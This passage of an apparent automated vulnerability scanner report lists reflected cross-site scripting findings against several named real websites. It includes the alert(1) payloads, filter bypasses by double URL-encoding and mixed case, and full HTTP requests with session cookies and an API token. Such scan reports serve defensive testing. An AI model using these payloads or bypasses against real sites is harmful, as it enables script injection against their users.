This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the xz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mynaukri/mn_newsmartsearch.php?xz=b6033%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d8060b71fa2&qc=16987&tem=ibm HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com; __utma=159336229.1771676399.1305381499.1305381499.1305381499.1; __utmb=159336229; __utmc=159336229; __utmz=159336229.1305381499.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _nkjs=0.52285400+1305381509380163

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 30330
Content-Type: text/html
X-Pad: avoid browser bug
Date: Sat, 14 May 2011 13:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Jobs in In
...[SNIP]...
<input type="hidden" name="xz" value="b6033"style="x:expression(alert(1))"d8060b71fa2">
...[SNIP]...

6.24. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobsearch.naukri.com
Path:   /mynaukri/mn_newsmartsearch.php

Issue detail

The value of the xz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3695b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97df6177a7f was submitted in the xz parameter. This input was echoed as 3695b"><script>alert(1)</script>97df6177a7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the xz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mynaukri/mn_newsmartsearch.php?xz=3695b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97df6177a7f&qc=30982&tem=hettich HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; test=naukri.com; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmz=266160400.1305381568.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=266160400.1737653072.1305381568.1305381568.1305381568.1; __utmc=266160400; __utmb=266160400.1.10.1305381568

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 30326
Content-Type: text/html
X-Pad: avoid browser bug
Date: Sat, 14 May 2011 13:59:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Jobs in In
...[SNIP]...
<input type="hidden" name="xz" value="3695b"><script>alert(1)</script>97df6177a7f">
...[SNIP]...

6.25. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php [xz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobsearch.naukri.com
Path:   /mynaukri/mn_newsmartsearch.php

Issue detail

The value of the xz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f17a9%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253ea313fdc1f57 was submitted in the xz parameter. This input was echoed as f17a9"><ScRiPt>alert(1)</ScRiPt>a313fdc1f57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

There is probably no need to perform a second URL-decode of the value of the xz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /mynaukri/mn_newsmartsearch.php?xz=f17a9%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253ea313fdc1f57&sh=a HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; __utmz=159336229.1305381698.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/0|utmcmd=referral; __utma=159336229.1701716958.1305381698.1305381698.1305396058.2; __utmc=159336229; test=naukri.com

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 30326
Content-Type: text/html
X-Pad: avoid browser bug
Date: Sat, 14 May 2011 18:48:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Jobs in In
...[SNIP]...
<input type="hidden" name="xz" value="f17a9"><ScRiPt>alert(1)</ScRiPt>a313fdc1f57">
...[SNIP]...

6.26. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.zoosk.com
Path:   /signup.php/%22onmouseover=prompt%28980185%29%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36c7"><script>alert(1)</script>134a1a57907 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php/%22onmouseovera36c7"><script>alert(1)</script>134a1a57907=prompt%28980185%29%3E HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: login.zoosk.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lZamc0WkdObU9EZGtabVZtWVRsaE16YzFNelU0TmpGaU5qVTBOamt4WWpRaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 16:06:40 GMT
Server: Apache
P3P: CP="CAO PSA OUR"
Expires: Thu, 11 Nov 1982 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=1, pre-check=2
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=995
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 16355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="https://login.zoosk.com/signup.php/%22onmouseovera36c7"><script>alert(1)</script>134a1a57907=prompt%28980185%29%3E" />
...[SNIP]...

6.27. http://nmp.newsgator.com/NGBUZZ/buzz.ashx [_dsrId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBUZZ/buzz.ashx

Issue detail

The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 896d1<script>alert(1)</script>dc531edf8f6 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBUZZ/buzz.ashx?load=data&apiToken=FBE4426140F444809F0B7D3A1169578F&buzzId=113828&_dsrId=ngbuzz_113828_data896d1<script>alert(1)</script>dc531edf8f6 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Sat, 14 May 2011 17:38:55 GMT
ETag: 634409699355432074
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Content-Length: 14987
Cache-Control: public, max-age=300
Date: Sat, 14 May 2011 18:04:38 GMT
Connection: close

window.ng_scriptload({id:'ngbuzz_113828_data896d1<script>alert(1)</script>dc531edf8f6',status:200,statusText:'200 OK',response:{Data:[{Description:'FRANKFURT (Reuters) - U.S. investor Lone Star could sell part of German bank IKB to BNP Paribas but is having a hard time finding a buy
...[SNIP]...

6.28. http://nmp.newsgator.com/NGBuzz/Buzz.ashx [buzzId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/Buzz.ashx

Issue detail

The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload a60c2<script>alert(1)</script>ed3cbb62fe5 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NGBuzz/Buzz.ashx?buzzId=113828a60c2<script>alert(1)</script>ed3cbb62fe5&apiToken=FBE4426140F444809F0B7D3A1169578F HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Content-Type: text/javascript; charset=utf-8
Content-Length: 102
Cache-Control: private, max-age=600
Date: Sat, 14 May 2011 18:04:24 GMT
Connection: close
Vary: Accept-Encoding

//An error occurred: Could not find Buzz item with id: 113828a60c2<script>alert(1)</script>ed3cbb62fe5

6.29. http://nmp.newsgator.com/NGBuzz/Buzz.ashx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/Buzz.ashx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a4fa%3balert(1)//6249158d994 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a4fa;alert(1)//6249158d994 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NGBuzz/Buzz.ashx?buzzId=113828&apiToken=FBE4426140F444809F0B7D3A1169578F&9a4fa%3balert(1)//6249158d994=1 HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
Referer: http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Last-Modified: Mon, 31 Jan 2011 21:23:25 GMT
ETag: 634320806054306710
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Content-Length: 17391
Cache-Control: public, max-age=600
Date: Sat, 14 May 2011 18:04:32 GMT
Connection: close

try{var buzzTemplate_113828="{if \n\tLoadScript(NGBaseUrl + \"NGScripts/jquery/v1.2/jquery-1.2.1.min.js\", \"window.jQuery != null\") &&\n\tLoadScript(NGBaseUrl + \"NGScripts/BuzzTemplates/videoPlayer
...[SNIP]...
,apiToken:'FBE4426140F444809F0B7D3A1169578F',name:'Reuters IN: International Deals News',buzzAppUrl:'http://nmp.newsgator.com/NGBuzz/',buzzId:113828,directUrl:'http://hosted.newsgator.com/',extraArgs:{9a4fa;alert(1)//6249158d994:'1'},targetId:null});
           
           b._targetId = targetId;
           
           b.render();
       } else {
           setTimeout(function(){
               s();
           }, 50);
       }
   } catch(e){
       
   }
};
setTimeout(s, 1);
})();var bu
...[SNIP]...

6.30. http://www.99labels.com/v1/brand-items.aspx [CategoryID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/brand-items.aspx

Issue detail

The value of the CategoryID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c56ff"%3balert(1)//76f550f8f78 was submitted in the CategoryID parameter. This input was echoed as c56ff";alert(1)//76f550f8f78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5c56ff"%3balert(1)//76f550f8f78&subCategoryID=Nzg5 HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/DeliveryPolicy.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.2.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Location: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5c56ff";alert(1)//76f550f8f78&subCategoryID=Nzg5
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:39:18 GMT
Content-Length: 123775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">
function MyOpenLytebox() {

var myUrl="http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5c56ff";alert(1)//76f550f8f78&subCategoryID=Nzg5";
var a = document.createElement("a");
a.title = ""
a.rel = "lyteframe";
a.rev = "width: 450px; height: 265px; scrolling: auto;";
a.href
...[SNIP]...

6.31. http://www.99labels.com/v1/brand-items.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/brand-items.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 959c1"%3balert(1)//6820804bc38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 959c1";alert(1)//6820804bc38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5&959c1"%3balert(1)//6820804bc38=1 HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/DeliveryPolicy.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.2.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Location: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5&959c1";alert(1)//6820804bc38=1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:48:08 GMT
Content-Length: 123778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">
function MyOpenLytebox() {

var myUrl="http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5&959c1";alert(1)//6820804bc38=1";
var a = document.createElement("a");
a.title = ""
a.rel = "lyteframe";
a.rev = "width: 450px; height: 265px; scrolling: auto;";
a.href = "loginpopup.as
...[SNIP]...

6.32. http://www.99labels.com/v1/brand-items.aspx [subCategoryID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.99labels.com
Path:   /v1/brand-items.aspx

Issue detail

The value of the subCategoryID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2962"%3balert(1)//f057abdf14f was submitted in the subCategoryID parameter. This input was echoed as a2962";alert(1)//f057abdf14f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5a2962"%3balert(1)//f057abdf14f HTTP/1.1
Host: www.99labels.com
Proxy-Connection: keep-alive
Referer: http://www.99labels.com/v1/DeliveryPolicy.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPX99ANONYMOUS=4ZXTm6wxRhDD4Oy9AjUJHOiAGBtNAUNw9Bp4knlj0psQzkkG18UPBf6hDCBJ4NYgDOzd6ZiJ6KMpMk3-wKPjc7G7Fg_gOniwp0C5QXTBtrssba5rAUvn6wad1ZlsYE0qIYhDVgK9dVpRbmHT7yYp-dwDLTIR46wybHqbi9EjCpSTpcjv0; ASP.NET_SessionId=sw5rqr454tm12q55eju1glz4; X-Mapping-nphficco=A600CB3C75C545347E22006DE45F782A; __utmz=24553842.1305398223.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fbsetting_184918808211406=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; expandable=-1c; __utma=24553842.2079333484.1305398223.1305398223.1305398223.1; __utmc=24553842; __utmb=24553842.2.10.1305398223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Location: http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5a2962";alert(1)//f057abdf14f
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:40:18 GMT
Content-Length: 123775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">
function MyOpenLytebox() {

var myUrl="http://www.99labels.com/v1/brand-items.aspx?SalesId=OTAx&CategoryID=NzY5&subCategoryID=Nzg5a2962";alert(1)//f057abdf14f";
var a = document.createElement("a");
a.title = ""
a.rel = "lyteframe";
a.rev = "width: 450px; height: 265px; scrolling: auto;";
a.href = "loginpopup.aspx
...[SNIP]...

6.33. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9985<script>alert(1)</script>900f9a49cb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpa9985<script>alert(1)</script>900f9a49cb1 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 14 May 2011 14:13:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=ebj703gvt5r2gslmpt3d04joq2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpa9985<script>alert(1)</script>900f9a49cb1</strong>
...[SNIP]...

6.34. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acdce"-alert(1)-"46cb1b4d668 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpacdce"-alert(1)-"46cb1b4d668 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 14 May 2011 14:13:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=vsq9rt013l0c7oj43i8m6quc00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpacdce"-alert(1)-"46cb1b4d668";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

6.35. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5587"-alert(1)-"21beff286f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

